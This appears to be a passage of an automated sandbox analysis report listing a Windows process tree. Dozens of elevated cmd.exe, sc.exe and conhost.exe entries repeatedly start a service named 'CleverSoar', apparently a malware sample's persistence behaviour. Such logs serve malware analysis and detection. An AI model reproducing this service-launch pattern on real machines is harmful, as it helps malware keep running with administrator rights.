                                            Target ID:13
                                            Start time:01:52:32
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:14
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:15
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:16
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:17
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:18
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:22
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:24
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:25
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:29
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:31
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:33
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:34
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:37
                                            Start time:01:52:33
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:38
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:39
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:40
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:41
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:42
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:43
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:44
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:45
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:46
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:47
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:48
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:49
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:50
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:51
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:52
                                            Start time:01:52:34
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:53
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:54
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:55
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:56
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:57
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:58
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:59
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:60
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:61
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:62
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:63
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:64
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:65
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:66
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:67
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:68
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:69
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:70
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:72
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:73
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:74
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:75
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:76
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:77
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:78
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:79
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:80
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
